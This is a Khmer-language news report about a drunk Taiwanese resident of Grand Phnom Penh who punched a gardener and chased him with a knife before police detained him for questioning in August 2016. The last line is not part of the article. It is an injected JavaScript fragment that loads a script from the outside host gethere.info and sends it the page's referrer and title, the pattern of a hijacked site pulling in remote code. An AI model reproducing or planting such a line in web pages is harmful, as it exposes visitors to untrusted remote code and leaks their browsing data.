ជនជាតិតៃវ៉ាន់ម្នាក់ស្រវឹងស្រា វាយ និងដេញចាក់កម្មករថែសួន Grand Phnom Penh ត្រូវនគរបាលប៉ុស្តិ៍ឃ្មួញ ឃាត់ខ្លួនមកសួរនាំ
ភ្នំពេញ៖ ជនជាតិចិនតៃវ៉ាន់ម្នាក់ត្រូវនគបាលប៉ុស្តិ៍ឃ្មួញឃាត់ខ្លួនមកសួរនាំក្រោធ្វើសកម្មភាពវាយ និងទាញកាំបិតកម្មករថែសួនក្នុង Grand Phnom Penh។ ហេតុការណ៍នេះកើតឡើងតាំងពីវេលាម៉ោង ៣ និង០០នាទីរសៀល ថ្ងៃទី១២ខែសីហា ឆ្នាំ ២០១៦ រហូតដល់ម៉ោង ៦និង៣០នាទី ល្ងាចថ្ងៃទី ១៣ ខែសីហា ឆ្នាំ ២០១៦ ទើបកម្លាំងនគរបាលប៉ុស្តី៍ធ្វើការឃាត់ខ្លួនមកសួរនាំតាមពាក្យបណ្តឹងជនរងគ្រោះ។
ជនបង្កមានឈ្មោះ ឈីន ភេទប្រុស អាយុ៤៤ឆ្នាំ ជាជនជាតិតៃវ៉ាន ស្នាក់នៅផ្ទះជួលលេខ E10 ផ្លូវលេខ ០៦ Grand Phnom Penh ភូមិអន្្លង់ក្ងាន សង្កាត់ឃ្មួញ ខណ្ឌសែនសុខ។
ជនរងគ្រោះមានឈ្មោះ អ៊ែល វ៉ា ភេទប្រុស អាយុ ២៨ឆ្នាំ មុខរបរអ្នកថែសួន Grand Phnom Penh ស្នាក់នៅ សហគមន៍ភូមិសំរោងមានជ័យ សង្កាត់ឃ្មួញ ខណ្ឌសែនសុខ។
តាមការរៀបរាប់ពីជនរងគ្រោះបានអោយដឹងថា នៅមុនពេលកើតហេតុ ខ្លួនកំពុងតែស្រោចផ្កាសុខៗ ក៍លេចមុខ ជនជាតិតៃវ៉ាន់ម្នាក់បានដើរសំដៅមក រួចបានទាញមួកពីក្បាលរបស់គាត់ និងបានវាយមួយដៃចំថ្គាមខាង ឆ្វេងរួចបានដើរចូលផ្ទះមួយសន្ទុះបានត្រឡប់មកវិញជាមួយនិងកាំបិតចុងស្រួចដងខ្មៅ ដេញចាក់គាត់ ដោយមានការជួយអន្តរាគមន៍ពីសន្តិសុខ ជនជាតិចិននោះបានរត់ទៅសម្ងំក្នុងផ្ទះបាត់ រហូតដល់វេលាម៉ោង ៤ល្ងាចថ្ងៃទី ១៣ ទើបចេញមកក្រៅផ្ទះ ទើបជនរងគ្រោះហៅសមត្ថកិច្ចអោយធ្វើការឃាត់ខ្លួនមកសួរនាំ។
ប្រភពពីអ្នកជិតខាងថា ជនជាតិតៃវ៉ាន់ខាងលើជាមនុស្សស្លូតបូត មិនសូវនិយាយស្តីទេ តែបើស្រាចូលខ្លួនវិញ តែងកំរោលចូលដេញវាយគេឯងជាញ៉ឹកញាប់។
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;